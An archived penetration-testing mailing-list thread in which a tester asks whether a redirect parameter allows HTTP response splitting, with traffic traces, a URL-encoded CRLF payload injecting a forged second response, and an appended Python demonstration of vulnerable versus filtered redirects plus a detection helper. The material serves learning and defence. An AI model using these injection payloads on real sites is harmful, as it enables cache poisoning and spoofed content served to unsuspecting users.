Penetration Testing mailing list archives
Re: Is there a HTTP Response Splitting Flaw?
From: "Gleb Paharenko" <gpaharenko () gmail com>
Date: Wed, 30 Apr 2008 10:42:39 +0300
Hi. The service is vulnerable to HTTP splitting in case it does not filter control characters in the output. Splitting can be utilized in several attack vectors, and cache poisoning is only one of them. When I was researching the article of Amit Klein, I was able to easily reproduce cache poisoning with Apache, however failed with Squid. My advice is to emulate the attack in a lab environment and then try it in the wild. BTW: fresh Squid has some protection patches against cache poisoning. Headers can be normalized by the upstream proxy, so you should be aware of it. You can also cross-post your question to the more specific webappsec mailing list.

2008/4/29 <bin4ry () theknetgroup org>:
Hi all, I'm new to this community as well as to pen-testing. I've already done some jobs for smaller companies and IT infrastructures. Now I have to pen-test a website. I need to perform a black-box test and I've already found some XSS and some SQL injection bugs which I've reported to the site admin. Now I believe that there's an HTTP response splitting flaw as well. I found this suspicious resource:

foo.bar/accept?dest=/xy/z

This looks like a redir script, right? So this is what I get:

GET foo.bar/accept?dest=/xy/z HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive

HTTP/1.x 302 Moved Temporarily   <<<<<< looks suspicious
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:09:42 GMT
Location: foo.bar/xy/z   <<<<<<<
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Runtime: 0.39293
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from prx-deka-02.f.ddk
----------------------------------------------------------
GET /xy/z HTTP/1.1   <<<<< that's it, right?
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "e7346ba9885de32fe8d51358b8a409af"

HTTP/1.x 304 Not Modified   <<<<< comes straight from a squid proxy
Via: A_PROXY
Date: Fri, 25 Apr 2008 12:09:42 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "e7346ba9885de32fe8d51358b8a409af"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS from A_PROXY

Till now everything looks like a response splitting flaw. That's why I pass this one to $dest:

/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E

Which is:

/xy/z

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: no-cache
Last-Modified: Tue, 15 Nov 2055 12:45:26 GMT
Content-Length: 36
<html>HTTP Response Splitting</html>

So, again our HTTP traffic, now with an injected HTTP header:

GET /accept?dest=/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive

HTTP/1.x 302 Moved Temporarily
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:07:47 GMT
Location: foo.bar/de/xy/z
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from A_PROXY
----------------------------------------------------------
GET /xy/z HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "78ad90f3569fd7b31ad763f3f52e2c46"

HTTP/1.x 304 Not Modified
Via: 1.0 A_PROXY
Date: Fri, 25 Apr 2008 12:07:48 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "78ad90f3569fd7b31ad763f3f52e2c46"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS A_PROXY

As you can see, the injected header won't be matched to the HTTP request from the redir script. I tried several CRLF types: %0d%0a, %0a%0a and %0a, but as we can see this is a Linux box, therefore %0d%0a should work. There's a Squid between me and foo.bar. The whitepaper from Sanctum says that Squid has a packet-boundary approach and messages are read as packets, and therefore injected headers may need to be padded. Can someone help me out? Thanks.

P.S.: And another question. Since I am not really familiar with response splitting, I'd like to ask you whether the risk of response splitting is always present when a script utilizes user input to form a new address which is the target of a redirection script, which manifests in an HTTP 302 header from the server? Thanks and greetings to the community from Germany.
------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
--
Best regards.
Gleb Pakharenko.
http://gpaharenko.livejournal.com
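The redirect pattern bin4ry suspects and the control-character filtering Gleb's reply calls for, as an added Python example that is not code from either poster or from the site under test. The handler layout, the host foo.bar, the paths and the injected value are all constructed for the demo; the parser models a naive client or cache that reads status line, headers and a Content-Length body, which is enough to show why one server reply can be read as two messages.

```python
# Added example for this thread, not code from either poster or from the site
# under test. It shows (1) a redirect script of the shape bin4ry suspected,
# which reflects its decoded `dest` parameter into Location; (2) the hardened
# form, which applies the control-character filtering Gleb's reply describes;
# (3) a minimal response parser that shows what a downstream client or cache
# sees when CR LF reaches the header section. Host, paths and the injected
# value are constructed for the demo; the handler layout is hypothetical.
import re
from urllib.parse import unquote

CRLF = "\r\n"
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")   # CR, LF and other controls


def vulnerable_redirect(dest: str) -> bytes:
    """Reflects the decoded value straight into Location, so %0d%0a becomes
    a real line break inside the response (the defect under discussion)."""
    location = "http://foo.bar" + unquote(dest)
    return (
        "HTTP/1.1 302 Moved Temporarily" + CRLF
        + "Location: " + location + CRLF
        + "Content-Type: text/html; charset=utf-8" + CRLF
        + "Content-Length: 0" + CRLF + CRLF
    ).encode("latin-1")


def is_safe_redirect_target(dest: str) -> bool:
    """Validation applied before the value is used as a header: no control
    characters (this alone stops splitting), and only a local absolute path,
    which additionally rules out open redirects to other hosts."""
    value = unquote(dest)
    if CONTROL_CHARS.search(value):
        return False
    return value.startswith("/") and not value.startswith("//")


class HeaderInjection(ValueError):
    """Raised when a header value would break out of its line."""


def hardened_redirect(dest: str) -> bytes:
    """Same redirect as above, but refuses values that fail validation."""
    if not is_safe_redirect_target(dest):
        raise HeaderInjection("unsafe redirect target: %r" % dest)
    return (
        "HTTP/1.1 302 Moved Temporarily" + CRLF
        + "Location: http://foo.bar" + unquote(dest) + CRLF
        + "Content-Length: 0" + CRLF + CRLF
    ).encode("latin-1")


def parse_responses(raw: bytes) -> list:
    """Split a byte stream into HTTP messages the way a simple client or cache
    does: status line, headers up to the first blank line, then Content-Length
    bytes of body. One server reply that yields two messages is the splitting
    condition. Bytes that do not start with a status line end the parse."""
    messages = []
    pos = 0
    while pos < len(raw) and raw.startswith(b"HTTP/", pos):
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end < 0:
            break
        lines = raw[pos:head_end].decode("latin-1").split(CRLF)
        headers = {}
        for line in lines[1:]:
            name, sep, value = line.partition(":")
            if sep:
                headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        length = int(headers.get("content-length", "0"))
        messages.append({"status": lines[0], "headers": headers,
                         "body": raw[body_start:body_start + length]})
        pos = body_start + length
    return messages


def count_responses(handler, dest: str) -> int:
    """Number of HTTP messages one call to `handler` produces for `dest`."""
    return len(parse_responses(handler(dest)))


def suspicious_request_uri(uri: str) -> bool:
    """Log-review helper: flags a request URI whose decoded form contains a
    control character, i.e. an attempt to reach the header section."""
    return bool(CONTROL_CHARS.search(unquote(uri)))


# Constructed injected value in the same shape as the one in the thread but
# shorter: CRLF CRLF terminates the 302, then a complete second response.
INJECTED = ("/xy/z%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
            "Content-Length:%205%0d%0a%0d%0ahello")

if __name__ == "__main__":
    print(count_responses(vulnerable_redirect, "/xy/z"))       # 1
    print(count_responses(vulnerable_redirect, INJECTED))      # 2
    print(is_safe_redirect_target(INJECTED))                   # False
    print(suspicious_request_uri("/accept?dest=" + INJECTED))  # True
```

The parser deliberately ignores chunked encoding and the stream-level behaviour Gleb mentions (an upstream proxy such as Squid may normalize or re-frame headers), so it shows the best case for the client, not what a given cache will actually store; that is exactly why his advice to reproduce in a lab before drawing conclusions applies. On the server side the only fix that matters is the one in is_safe_redirect_target: reject or encode CR and LF before any user-controlled value becomes a header.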
Current thread:
- Is there a HTTP Response Splitting Flaw? bin4ry (Apr 29)
- Re: Is there a HTTP Response Splitting Flaw? Gleb Paharenko (Apr 30)